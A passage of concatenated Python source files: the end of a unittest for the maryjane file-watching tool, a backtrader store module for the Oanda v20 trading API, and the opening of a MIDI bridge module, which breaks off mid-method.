self.assertEqual(root['title'], '''
A simple multi-line
text.A simple multi-line
text. ''')
self.assertEqual(root['version'], '0.1.0')
self.assertIsNone(root['empty'])
self.assertEqual(root['static'], join(self.stuff_dir, 'static'))
self.assertDictEqual(
root['bag'],
{
'avg': .34,
'count': 11,
'item1': {
'item2': 'value2'
}
}
)
self.assertEqual(root['text_files']['file1'], join(self.stuff_dir, 'static', 'file1.txt'))
self.assertEqual(root['text_files']['files'], [
join(self.stuff_dir, 'static', 'file2.txt'),
join(self.stuff_dir, 'static', 'file3.txt'),
join(self.stuff_dir, 'contrib', 'file1.txt'),
join(self.stuff_dir, 'static', 'misc', 'no-watch-file.txt'),
join(self.stuff_dir, 'static', 'misc', 'file1.txt'),
])
self.assertRaises(AttributeError, lambda: root.non_exists)
project.reload()
root = project.root
self.assertEqual(root['text_files']['file1'], join(self.stuff_dir, 'static', 'file1.txt'))
self.assertRegex(root['text_files']['ls_result'].replace('\n', ''), r'(generator\.py|index\.css|out\.txt)')
def test_watch(self):
project = Project(join(self.stuff_dir, 'maryjane.yml'), watcher_type=Observer, watch_delay=.000001, debug=True)
t = threading.Thread(daemon=True, target=project.wait_for_changes)
t.start()
time.sleep(WAIT)
# Simple watch
with open(self.file1, 'w') as f:
f.write('file1 edited.\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertEqual(f.readline().strip(), 'file1 edited.')
with open(self.file1, 'w') as f:
f.write('file1\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertEqual(f.readline().strip(), 'file1')
# Recursive watch test
with open(self.misc_file1, 'w') as f:
f.write('misc file1 edited.\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertEqual(next(reversed(f.readlines())).strip(), 'misc file1 edited.')
with open(self.misc_file1, 'w') as f:
f.write('misc file1\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertEqual(next(reversed(f.readlines())).strip(), 'misc file1')
# Exclude
with open(self.nowatch_file1, 'w') as f:
f.write('excluded edited file.\n')
time.sleep(WAIT)
with open(self.outfile) as f:
self.assertNotIn('excluded edited file.', f.read())
with open(self.nowatch_file1, 'w') as f:
f.write('excluded file\n')
# Single file watch
with open(self.unused_file, 'w') as f:
f.write('Some dummy texts: %s.\n' % random.random())
time.sleep(WAIT)
# Watch in root of maryjane.yml
with open(self.dummy_file, 'w') as f:
f.write('Some dummy data: %s.\n' % random.random())
time.sleep(WAIT)
def test_exceptions(self):
self.assertRaises(MaryjaneSyntaxError, Project, join(self.stuff_dir, 'bad-file.yml'))
self.assertRaises(MaryjaneSyntaxError, Project, join(self.stuff_dir, 'invalid-directive.yml'))
self.assertRaises(CalledProcessError, Project, join(self.stuff_dir, 'subprocess-error.yml'))
if __name__ == '__main__': # pragma: no cover
unittest.main()
|
oandav20store.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import collections
import threading
import copy
import json
import time as _time
from datetime import datetime, timezone
import v20
import backtrader as bt
from backtrader.metabase import MetaParams
from backtrader.utils.py3 import queue, with_metaclass
class SerializableEvent(object):
'''A threading.Event that can be serialized.'''
def __init__(self):
self.evt = threading.Event()
def set(self):
return self.evt.set()
def clear(self):
return self.evt.clear()
def isSet(self):
return self.evt.isSet()
def wait(self, timeout=0):
return self.evt.wait(timeout)
def __getstate__(self):
d = copy.copy(self.__dict__)
if self.evt.isSet():
d['evt'] = True
else:
d['evt'] = False
return d
def __setstate__(self, d):
self.evt = threading.Event()
if d['evt']:
self.evt.set()
class MetaSingleton(MetaParams):
'''Metaclass to make a metaclassed class a singleton'''
def __init__(cls, name, bases, dct):
super(MetaSingleton, cls).__init__(name, bases, dct)
cls._singleton = None
def __call__(cls, *args, **kwargs):
if cls._singleton is None:
cls._singleton = (
super(MetaSingleton, cls).__call__(*args, **kwargs))
return cls._singleton
class OandaV20Store(with_metaclass(MetaSingleton, object)):
'''Singleton class wrapping to control the connections to Oanda v20.
Params:
- ``token`` (default:``None``): API access token
- ``account`` (default: ``None``): account id
- ``practice`` (default: ``False``): use the test environment
- ``account_poll_freq`` (default: ``5.0``): refresh frequency for
account value/cash refresh
- ``stream_timeout`` (default: ``2``): timeout for stream requests
- ``poll_timeout`` (default: ``2``): timeout for poll requests
- ``reconnections`` (default: ``-1``): number of reconnection attempts on
connection errors (``-1`` retries forever)
- ``reconntimeout`` (default: ``5.0``): how long to wait before reconnecting
a stream (feeds have their own reconnection settings)
- ``notif_transactions`` (default: ``False``): notify the store of all received
transactions
'''
params = dict(
token='',
account='',
practice=False,
# account balance refresh timeout
account_poll_freq=5.0,
# stream timeout
stream_timeout=2,
# poll timeout
poll_timeout=2,
# count of reconnections, -1 unlimited, 0 none
reconnections=-1,
# timeout between reconnections
reconntimeout=5.0,
# send store notifications with received transactions
notif_transactions=False,
)
BrokerCls = None # broker class will auto register
DataCls = None # data class will auto register
# Oanda supported granularities
'''S5, S10, S15, S30, M1, M2, M3, M4, M5, M10, M15, M30, H1,
H2, H3, H4, H6, H8, H12, D, W, M'''
_GRANULARITIES = {
(bt.TimeFrame.Seconds, 5): 'S5',
(bt.TimeFrame.Seconds, 10): 'S10',
(bt.TimeFrame.Seconds, 15): 'S15',
(bt.TimeFrame.Seconds, 30): 'S30',
(bt.TimeFrame.Minutes, 1): 'M1',
(bt.TimeFrame.Minutes, 2): 'M2',
(bt.TimeFrame.Minutes, 3): 'M3',
(bt.TimeFrame.Minutes, 4): 'M4',
(bt.TimeFrame.Minutes, 5): 'M5',
(bt.TimeFrame.Minutes, 10): 'M10',
(bt.TimeFrame.Minutes, 15): 'M15',
(bt.TimeFrame.Minutes, 30): 'M30',
(bt.TimeFrame.Minutes, 60): 'H1',
(bt.TimeFrame.Minutes, 120): 'H2',
(bt.TimeFrame.Minutes, 180): 'H3',
(bt.TimeFrame.Minutes, 240): 'H4',
(bt.TimeFrame.Minutes, 360): 'H6',
(bt.TimeFrame.Minutes, 480): 'H8',
(bt.TimeFrame.Minutes, 720): 'H12',
(bt.TimeFrame.Days, 1): 'D',
(bt.TimeFrame.Weeks, 1): 'W',
(bt.TimeFrame.Months, 1): 'M',
}
# Order type matching with oanda
_ORDEREXECS = {
bt.Order.Market: 'MARKET',
bt.Order.Limit: 'LIMIT',
bt.Order.Stop: 'STOP',
bt.Order.StopTrail: 'TRAILING_STOP_LOSS'
}
# transactions which will be emitted on creating/accepting an order
_X_CREATE_TRANS = ['MARKET_ORDER',
'LIMIT_ORDER',
'STOP_ORDER',
'TAKE_PROFIT_ORDER',
'STOP_LOSS_ORDER',
'MARKET_IF_TOUCHED_ORDER',
'TRAILING_STOP_LOSS_ORDER']
# transactions which filled orders
_X_FILL_TRANS = ['ORDER_FILL']
# transactions which cancelled orders
_X_CANCEL_TRANS = ['ORDER_CANCEL']
# transactions which were rejected
_X_REJECT_TRANS = ['MARKET_ORDER_REJECT',
'LIMIT_ORDER_REJECT',
'STOP_ORDER_REJECT',
'TAKE_PROFIT_ORDER_REJECT',
'STOP_LOSS_ORDER_REJECT',
'MARKET_IF_TOUCHED_ORDER_REJECT',
'TRAILING_STOP_LOSS_ORDER_REJECT']
# transactions which can be ignored
_X_IGNORE_TRANS = ['DAILY_FINANCING',
'CLIENT_CONFIGURE']
# Date format used
_DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.%f000Z'
# Oanda api endpoints
_OAPI_URL = ['api-fxtrade.oanda.com',
'api-fxpractice.oanda.com']
_OAPI_STREAM_URL = ['stream-fxtrade.oanda.com',
'stream-fxpractice.oanda.com']
@classmethod
def getdata(cls, *args, **kwargs):
'''Returns ``DataCls`` with args, kwargs'''
return cls.DataCls(*args, **kwargs)
@classmethod
def getbroker(cls, *args, **kwargs):
'''Returns broker with *args, **kwargs from registered ``BrokerCls``'''
return cls.BrokerCls(*args, **kwargs)
def __init__(self):
'''Initialization'''
super(OandaV20Store, self).__init__()
self.notifs = collections.deque() # store notifications for cerebro
self._cash = 0.0 # margin available, currently available cash
self._value = 0.0 # account balance
self._currency = None # account currency
self._leverage = 1 # leverage
self._client_id_prefix = str(datetime.now().timestamp())
self.broker = None # broker instance
self.datas = list() # datas that have registered over start
self._env = None # reference to cerebro for general notifications
self._evt_acct = SerializableEvent()
self._orders = collections.OrderedDict() # map order.ref to order id
self._trades = collections.OrderedDict() # map order.ref to trade id
# init oanda v20 api context
self.oapi = v20.Context(
self._OAPI_URL[int(self.p.practice)],
poll_timeout=self.p.poll_timeout,
port=443,
ssl=True,
token=self.p.token,
datetime_format='UNIX',
)
# init oanda v20 api stream context
self.oapi_stream = v20.Context(
self._OAPI_STREAM_URL[int(self.p.practice)],
stream_timeout=self.p.stream_timeout,
port=443,
ssl=True,
token=self.p.token,
datetime_format='UNIX',
)
def start(self, data=None, broker=None):
# datas require some processing to kickstart data reception
if data is None and broker is None:
self.cash = None
return
if data is not None:
self._env = data._env
# For datas simulate a queue with None to kickstart co
self.datas.append(data)
if self.broker is not None:
self.broker.data_started(data)
elif broker is not None:
self.broker = broker
self.streaming_events()
self.broker_threads()
def stop(self):
# signal end of thread
if self.broker is not None:
self.q_ordercreate.put(None)
self.q_orderclose.put(None)
self.q_account.put(None)
def put_notification(self, msg, *args, **kwargs):
'''Adds a notification'''
self.notifs.append((msg, args, kwargs))
def get_notifications(self):
'''Return the pending "store" notifications'''
self.notifs.append(None) # put a mark / threads could still append
return [x for x in iter(self.notifs.popleft, None)]
def get_positions(self):
'''Returns the currently open positions'''
try:
response = self.oapi.position.list_open(self.p.account)
pos = response.get('positions', 200)
# convert positions to dict
for idx, val in enumerate(pos):
pos[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return pos
except NameError:
return None
def get_granularity(self, timeframe, compression):
'''Returns the granularity usable for oanda'''
return self._GRANULARITIES.get((timeframe, compression), None)
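# Illustrative sketch (added): the lookup maps a (timeframe, compression) pair onto
# Oanda's granularity string and returns None when unsupported; `store` below is a
# hypothetical OandaV20Store instance:
#
#     store.get_granularity(bt.TimeFrame.Minutes, 60)   # 'H1'
#     store.get_granularity(bt.TimeFrame.Minutes, 7)    # None (no matching granularity)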
def get_instrument(self, dataname):
'''Returns details about the requested instrument'''
try:
response = self.oapi.account.instruments(
self.p.account,
instruments=dataname)
inst = response.get('instruments', 200)
# convert instruments to dict
for idx, val in enumerate(inst):
inst[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return inst[0]
except NameError:
return None
def get_instruments(self, dataname):
'''Returns details about available instruments'''
try:
response = self.oapi.account.instruments(
self.p.account,
instruments=dataname)
inst = response.get('instruments', 200)
# convert instruments to dict
for idx, val in enumerate(inst):
inst[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return inst
except NameError:
return None
def get_pricing(self, dataname):
'''Returns details about current price'''
try:
response = self.oapi.pricing.get(self.p.account,
instruments=dataname)
prices = response.get('prices', 200)
# convert prices to dict
for idx, val in enumerate(prices):
prices[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return prices[0]
except NameError:
return None
def get_pricings(self, dataname):
'''Returns details about current prices'''
try:
response = self.oapi.pricing.get(self.p.account,
instruments=dataname)
prices = response.get('prices', 200)
# convert prices to dict
for idx, val in enumerate(prices):
prices[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return prices
except NameError:
return None
def get_transactions_range(self, from_id, to_id, exclude_outer=False):
'''Returns all transactions between range'''
try:
response = self.oapi.transaction.range(
self.p.account,
fromID=from_id,
toID=to_id)
transactions = response.get('transactions', 200)
if exclude_outer:
del transactions[0], transactions[-1]
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return transactions
except NameError:
return None
def get_transactions_since(self, id):
'''Returns all transactions since id'''
try:
response = self.oapi.transaction.since(
self.p.account,
id=id)
transactions = response.get('transactions', 200)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return transactions
except NameError:
return None
def get_cash(self):
'''Returns the available cash'''
return self._cash
def get_value(self):
'''Returns the account balance'''
return self._value
def get_currency(self):
'''Returns the currency of the account'''
return self._currency
def get_leverage(self):
'''Returns the leverage of the account'''
return self._leverage
def broker_threads(self):
'''Creates threads for broker functionality'''
self.q_account = queue.Queue()
self.q_account.put(True) # force an immediate update
t = threading.Thread(target=self._t_account)
t.daemon = True
t.start()
self.q_ordercreate = queue.Queue()
t = threading.Thread(target=self._t_order_create)
t.daemon = True
t.start()
self.q_orderclose = queue.Queue()
t = threading.Thread(target=self._t_order_cancel)
t.daemon = True
t.start()
# Wait once for the values to be set
self._evt_acct.wait(self.p.account_poll_freq)
def streaming_events(self):
'''Creates threads for event streaming'''
q = queue.Queue()
kwargs = {'q': q}
t = threading.Thread(target=self._t_streaming_events, kwargs=kwargs)
t.daemon = True
t.start()
return q
def streaming_prices(self, dataname):
'''Creates threads for price streaming'''
q = queue.Queue()
kwargs = {'q': q, 'dataname': dataname}
t = threading.Thread(target=self._t_streaming_prices, kwargs=kwargs)
t.daemon = True
t.start()
return q
def order_create(self, order, stopside=None, takeside=None, **kwargs):
'''Creates an order'''
okwargs = dict()
okwargs['instrument'] = order.data._dataname
okwargs['units'] = (
abs(int(order.created.size)) if order.isbuy()
else -abs(int(order.created.size))) # negative for selling
okwargs['type'] = self._ORDEREXECS[order.exectype]
okwargs['replace'] = order.info.get('replace', None)
okwargs['replace_type'] = order.info.get('replace_type', None)
if order.exectype != bt.Order.Market:
okwargs['price'] = format(
order.created.price,
'.%df' % order.data.contractdetails['displayPrecision'])
if order.valid is None:
okwargs['timeInForce'] = 'GTC'  # good till cancelled
else:
okwargs['timeInForce'] = 'GTD'  # good till date
gtdtime = order.data.num2date(order.valid, tz=timezone.utc)
okwargs['gtdTime'] = gtdtime.strftime(self._DATE_FORMAT)
if order.exectype == bt.Order.StopTrail:
if 'replace' not in okwargs:
raise Exception('replace param needed for StopTrail order')
trailamount = order.trailamount
if order.trailpercent:
trailamount = order.price * order.trailpercent
okwargs['distance'] = format(
trailamount,
'.%df' % order.data.contractdetails['displayPrecision'])
if stopside is not None:
if stopside.exectype == bt.Order.StopTrail:
trailamount = stopside.trailamount
if stopside.trailpercent:
trailamount = order.price * stopside.trailpercent
okwargs['trailingStopLossOnFill'] = v20.transaction.TrailingStopLossDetails(
distance=format(
trailamount,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(stopside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
else:
okwargs['stopLossOnFill'] = v20.transaction.StopLossDetails(
price=format(
stopside.price,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(stopside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
if takeside is not None and takeside.price is not None:
okwargs['takeProfitOnFill'] = v20.transaction.TakeProfitDetails(
price=format(
takeside.price,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(takeside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
# store backtrader order ref in client extensions
okwargs['clientExtensions'] = v20.transaction.ClientExtensions(
id=self._oref_to_client_id(order.ref),
comment=json.dumps(order.info)
).dict()
okwargs.update(**kwargs) # anything from the user
self.q_ordercreate.put((order.ref, okwargs,))
# notify orders of being submitted
self.broker._submit(order.ref)
if stopside is not None: # don't make price on stopside mandatory
self.broker._submit(stopside.ref)
if takeside is not None and takeside.price is not None:
self.broker._submit(takeside.ref)
return order
def order_cancel(self, order):
'''Cancels an order'''
self.q_orderclose.put(order.ref)
return order
def candles(self, dataname, dtbegin, dtend, timeframe, compression,
candleFormat, includeFirst=True, onlyComplete=True):
'''Returns historical rates'''
q = queue.Queue()
kwargs = {'dataname': dataname, 'dtbegin': dtbegin, 'dtend': dtend,
'timeframe': timeframe, 'compression': compression,
'candleFormat': candleFormat, 'includeFirst': includeFirst,
'onlyComplete': onlyComplete, 'q': q}
t = threading.Thread(target=self._t_candles, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _oref_to_client_id(self, oref):
'''Converts an order ref to a client id'''
id = '{}-{}'.format(self._client_id_prefix, oref)
return id
def _client_id_to_oref(self, client_id):
'''Converts a client id to an order ref'''
oref = None
if str(client_id).startswith(self._client_id_prefix):
oref = int(str(client_id)[len(self._client_id_prefix)+1:])
return oref
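# Illustrative sketch (added): the two helpers above round-trip a backtrader order ref
# through the Oanda client extension id, using the store's timestamp prefix to recognise
# its own orders. With a hypothetical prefix value:
#
#     prefix = '1700000000.123456'                 # value of self._client_id_prefix
#     client_id = '{}-{}'.format(prefix, 42)       # -> '1700000000.123456-42'
#     int(client_id[len(prefix) + 1:])             # -> 42, the original order ref
#     # ids that do not start with the prefix map back to None (external orders)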
def _t_account(self):
'''Callback method for account request'''
while True:
try:
msg = self.q_account.get(timeout=self.p.account_poll_freq)
if msg is None:
break # end of thread
except queue.Empty: # tmout -> time to refresh
pass
try:
response = self.oapi.account.summary(self.p.account)
accinfo = response.get('account', 200)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if self.p.reconnections == 0:
self.put_notification('Giving up fetching account summary')
return
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
return
try:
self._cash = accinfo.marginAvailable
self._value = accinfo.balance
self._currency = accinfo.currency
self._leverage = 1/accinfo.marginRate
except KeyError:
pass
# notify of success, initialization waits for it
self._evt_acct.set()
def _t_streaming_events(self, q):
'''Callback method for streaming events'''
last_id = None
reconnections = 0
while True:
try:
response = self.oapi_stream.transaction.stream(
self.p.account
)
# process response
for msg_type, msg in response.parts():
if msg_type == 'transaction.TransactionHeartbeat':
if not last_id:
last_id = msg.lastTransactionID
# if a reconnection occurred
if reconnections > 0:
if last_id:
# get all transactions between the last seen and first from
# reconnected stream
old_transactions = self.get_transactions_since(
last_id)
for t in old_transactions:
if msg_type == 'transaction.Transaction':
if t.id > last_id:
self._transaction(t.dict())
last_id = t.id
reconnections = 0
if msg_type == 'transaction.Transaction':
if not last_id or msg.id > last_id:
self._transaction(msg.dict())
last_id = msg.id
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if (self.p.reconnections == 0 or self.p.reconnections > 0
and reconnections > self.p.reconnections):
# unable to reconnect after x times
self.put_notification('Giving up reconnecting streaming events')
return
reconnections += 1
if self.p.reconntimeout is not None:
_time.sleep(self.p.reconntimeout)
self.put_notification('Trying to reconnect streaming events ({} of {})'.format(
reconnections,
self.p.reconnections))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
def _t_streaming_prices(self, dataname, q):
'''Callback method for streaming prices'''
try:
response = self.oapi_stream.pricing.stream(
self.p.account,
instruments=dataname,
)
# process response
for msg_type, msg in response.parts():
if msg_type == 'pricing.ClientPrice':
# put price into queue as dict
q.put(msg.dict())
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
# notify feed of error
q.put({'msg': 'CONNECTION_ISSUE'})
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
def _t_candles(self, dataname, dtbegin, dtend, timeframe, compression,
candleFormat, includeFirst, onlyComplete, q):
'''Callback method for candles request'''
granularity = self.get_granularity(timeframe, compression)
if granularity is None:
q.put(None)
return
dtkwargs = {}
if dtbegin is not None:
dtkwargs['fromTime'] = dtbegin.strftime(self._DATE_FORMAT)
dtkwargs['includeFirst'] = includeFirst
count = 0
reconnections = 0
while True:
if count > 1:
dtkwargs['includeFirst'] = False
try:
response = self.oapi.instrument.candles(
dataname,
granularity=granularity,
price=candleFormat,
**dtkwargs)
candles = response.get('candles', 200)
reconnections = 0
count += 1
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if (self.p.reconnections == 0 or self.p.reconnections > 0
and reconnections > self.p.reconnections):
self.put_notification('Giving up fetching candles')
return
reconnections += 1
if self.p.reconntimeout is not None:
_time.sleep(self.p.reconntimeout)
self.put_notification(
'Trying to fetch candles ({} of {})'.format(
reconnections,
self.p.reconnections))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
continue
dtobj = None
for candle in candles:
# get current candle time
dtobj = datetime.utcfromtimestamp(float(candle.time))
# if end time is provided, check if time is reached for
# every candle
if dtend is not None and dtobj > dtend:
break
# add candle
if not onlyComplete or candle.complete:
q.put(candle.dict())
if dtobj is not None:
dtkwargs['fromTime'] = dtobj.strftime(self._DATE_FORMAT)
elif dtobj is None:
break
if dtend is not None and dtobj > dtend:
break
if len(candles) == 0:
break
q.put({})  # end of transmission
def _transaction(self, trans):
if self.p.notif_transactions:
self.put_notification(str(trans))
oid = None
ttype = trans['type']
if ttype in self._X_CREATE_TRANS:
# get order id (matches transaction id)
oid = trans['id']
oref = None
# identify backtrader order by checking client
# extensions (this is set when creating a order)
if 'clientExtensions' in trans:
# assume backtrader created the order for this transaction
oref = self._client_id_to_oref(trans['clientExtensions']['id'])
if oref is not None:
self._orders[oid] = oref
elif ttype in self._X_FILL_TRANS:
# order was filled, notify backtrader of it
oid = trans['orderID']
elif ttype in self._X_CANCEL_TRANS:
# order was cancelled, notify backtrader of it
oid = trans['orderID']
elif ttype in self._X_REJECT_TRANS:
# transaction was rejected, notify backtrader of it
oid = trans['requestID']
elif ttype in self._X_IGNORE_TRANS:
# transaction can be ignored
msg = 'Received transaction {} with id {}. Ignoring transaction.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
else:
msg = 'Received transaction {} with id {}. Unknown situation.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
return
if oid in self._orders:
# when an order id exists process transaction
self._process_transaction(oid, trans)
self._process_trades(self._orders[oid], trans)
else:
# external order created this transaction
if self.broker.p.use_positions and ttype in self._X_FILL_TRANS:
size = float(trans['units'])
price = float(trans['price'])
for data in self.datas:
if data._name == trans['instrument']:
self.broker._fill_external(data, size, price)
break
elif ttype not in self._X_IGNORE_TRANS:
# notify about unknown transaction
if self.broker.p.use_positions:
msg = 'Received external transaction {} with id {}. Skipping transaction.'
else:
msg = 'Received external transaction {} with id {}. Positions and trades may not match anymore.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
def _process_transaction(self, oid, trans):
try:
# get a reference to a backtrader order based on
# the order id / trade id
oref = self._orders[oid]
except KeyError:
return
ttype = trans['type']
if ttype in self._X_CREATE_TRANS:
self.broker._accept(oref)
elif ttype in self._X_FILL_TRANS:
size = float(trans['units'])
price = float(trans['price'])
self.broker._fill(oref, size, price, reason=trans['reason'])
# store order ids which were generated by the order
if 'tradeOpened' in trans:
self._orders[trans['tradeOpened']['tradeID']] = oref
if 'tradeReduced' in trans:
self._orders[trans['tradeReduced']['tradeID']] = oref
elif ttype in self._X_CANCEL_TRANS:
reason = trans['reason']
if reason == 'TIME_IN_FORCE_EXPIRED':
self.broker._expire(oref)
else:
self.broker._cancel(oref)
elif ttype in self._X_REJECT_TRANS:
self.broker._reject(oref)
def _process_trades(self, oref, trans):
if 'tradeID' in trans:
self._trades[oref] = trans['tradeID']
if 'tradeOpened' in trans:
self._trades[oref] = trans['tradeOpened']['tradeID']
if 'tradeClosed' in trans:
self._trades[oref] = trans['tradeClosed']['tradeID']
if 'tradesClosed' in trans:
for t in trans['tradesClosed']:
for key, value in self._trades.copy().items():
if value == t['tradeID']:
del self._trades[key]
def _t_order_create(self):
while True:
msg = self.q_ordercreate.get()
if msg is None:
break
oref, okwargs = msg
try:
if okwargs['replace']:
oid = '@{}'.format(
self._oref_to_client_id(okwargs['replace']))
if okwargs['replace'] in self._trades:
okwargs['tradeID'] = self._trades[okwargs['replace']]
if okwargs['replace_type']:
okwargs['type'] = okwargs['replace_type']
response = self.oapi.order.replace(
self.p.account,
oid,
order=okwargs)
else:
response = self.oapi.order.create(
self.p.account,
order=okwargs)
# get the transaction which created the order
o = response.get('orderCreateTransaction', 201)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
self.broker._reject(oref)
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
self.broker._reject(oref)
continue
def _t_order_cancel(self):
while True:
oref = self.q_orderclose.get()
if oref is None:
break
oid = None
for key, value in self._orders.items():
if value == oref:
oid = key
break
if oid is None:
continue # the order is no longer there
try:
# TODO either close pending orders or filled trades
response = self.oapi.order.cancel(self.p.account, oid)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
continue
self.broker._cancel(oref)
def _create_error_notif(self, e, response):
try:
notif = '{}: {} - {}'.format(
response.status,
response.reason,
response.get('errorMessage'))
except Exception:
notif = str(e)
return notif
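# Illustrative usage sketch (added, not part of the original module). How the store is
# wired into a backtrader run is an assumption here; the concrete feed and broker classes
# come from whatever package registers DataCls/BrokerCls on this store:
#
#     store = OandaV20Store(token='...', account='...', practice=True)
#     cerebro = bt.Cerebro()
#     cerebro.setbroker(store.getbroker())
#     data = store.getdata(dataname='EUR_USD',
#                          timeframe=bt.TimeFrame.Minutes, compression=5)
#     cerebro.adddata(data)
#     cerebro.run()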
|
midiate.py
|
# -*- coding: utf-8 -*-
##################################################################
## pymidiate ##
## Copyright (C) 2018-2019 PGkids Laboratory <lab@pgkids.co.jp> ##
##################################################################
import sys
import subprocess
import threading
import time
import pkg_resources
def get_default_bin_path():
path = pkg_resources.resource_filename(__name__, 'win32/intermidiator.exe')
if path.lower().find('a:\\dropbox\\home\\git\\pymidiate\\')==0:
# PGkids Laboratory Internal Environment
print('---------- DEVELOP ----------')
return 'a:/Dropbox/home/git/interMidiator/intermidiator.exe'
else:
# Public Environment
return path
def chr2hex(ascii):
if ascii <= 57: return (ascii-48)
else: return ascii-65 + 10
def int_from_hex3(c1,c2,c3):
return (chr2hex(c1)*16+chr2hex(c2))*16+chr2hex(c3)
def int_from_hex2(c1,c2):
return chr2hex(c1)*16+chr2hex(c2)
def take_handle_from_recv_msg(line):
return int_from_hex3(line[2],line[3],line[4])
def decode_callback_id(line, i):
result = 0
ascii = line[i]
while ascii>=48 and ascii<=57: # '0' to '9'
result = result*10 + (ascii-48)
i += 1
ascii = line[i]
return result
def decode_to_raw(b):
length = len(b)
if length <= 6:
r1 = int_from_hex2(b[0],b[1])
if length == 2: return (r1,)
else:
r2 = int_from_hex2(b[2],b[3])
if length == 4: return (r1, r2)
else: return (r1, r2, int_from_hex2(b[4],b[5]))
else:
# SysEx Message
i, tmp = 0, []
while i<length:
tmp.append(int_from_hex2(b[i],b[i+1]))
i += 2
return tuple(tmp)
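# Illustrative sketch (added): decode_to_raw turns the hex-encoded payload coming from
# interMidiator back into raw MIDI bytes, e.g. for hypothetical messages:
#
#     decode_to_raw(b'903C40')   # -> (144, 60, 64): Note On, middle C, velocity 64
#     decode_to_raw(b'C505')     # -> (197, 5):      Program Change on channel 6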
class MidiDevice():
handle = None
class MidiInDevice(MidiDevice):
def __init__(self, handle_in):
self.handle = handle_in
class MidiOutDevice(MidiDevice):
def __init__(self, handle_out):
self.handle = handle_out
class Midiator():
def __init__(self, *, monitor_stderr=False, interMidiator=get_default_bin_path()):
self.interMidiator = interMidiator
self.__proc = None
self.__crlf = None
self.endmsg = None
self.__terminator = None
self.__thread_monitor_stdout = None
self.__thread_monitor_stderr = None
self.__thread_keepalive_sender = None
self.__sem_1 = None
self.__sem_2 = None
self.__sem_keepalive = None
self.__gResult = None
self.__gError = None
self.__callback_dic = None
self.__prev_dev = None
self.__prev_msg = None
self.__prev_raw_msg = None
self.__requires_monitor_stderr = monitor_stderr
def __trunc(self,str):
return str[0:(-2 if self.__crlf else -1)]
def __monitor_stdout(self):
while True:
line = self.__proc.stdout.readline()
if line==b'': return
cmd = line[0];
if cmd == ord('C'):
id = decode_callback_id(line,2)
#print('the id=',id)
function = self.__callback_dic[id]
if self.__prev_raw_msg is None: self.__prev_raw_msg = decode_to_raw(self.__prev_msg)
function(self.__prev_dev, self.__prev_msg, self.__prev_raw_msg)
elif cmd == ord('3'):
self.__prev_dev = take_handle_from_recv_msg(line)
self.__prev_msg = line[6:12]
self.__prev_raw_msg = None
elif cmd == ord('2'):
self.__prev_dev = take_handle_from_recv_msg(line)
self.__prev_msg = line[6:10]
self.__prev_raw_msg = None
elif cmd == ord('1'):
self.__prev_dev = take_handle_from_recv_msg(line)
self.__prev_msg = line[6:8]
self.__prev_raw_msg = None
elif cmd == ord('X'):
self.__prev_dev = take_handle_from_recv_msg(line)
self.__prev_msg = line[6:(-2 if self.__crlf else -1)]
self.__prev_raw_msg = None
elif cmd == ord('{'):
self.__gResult = []
while True:
line = self.__proc.stdout.readline()
if line != (b'}\r\n' if self.__crlf else b'}\n'):
self.__gResult.append(self.__trunc(line).decode())
else: break
self.__sem_1.release()
self.__sem_2.acquire()
elif cmd == ord('<'):
self.__gResult = self.__trunc(line[2:])
self.__sem_1.release()
self.__sem_2.acquire()
elif cmd == ord('!') or cmd == ord('F'):
self.__gResult = None
self.__gError = self.__trunc(line[2:])
#sem_1.release()
#sem_2.acquire()
#else:
#print("[OUT]",line)
sys.stdout.flush();
def __monitor_stderr(self):
while True:
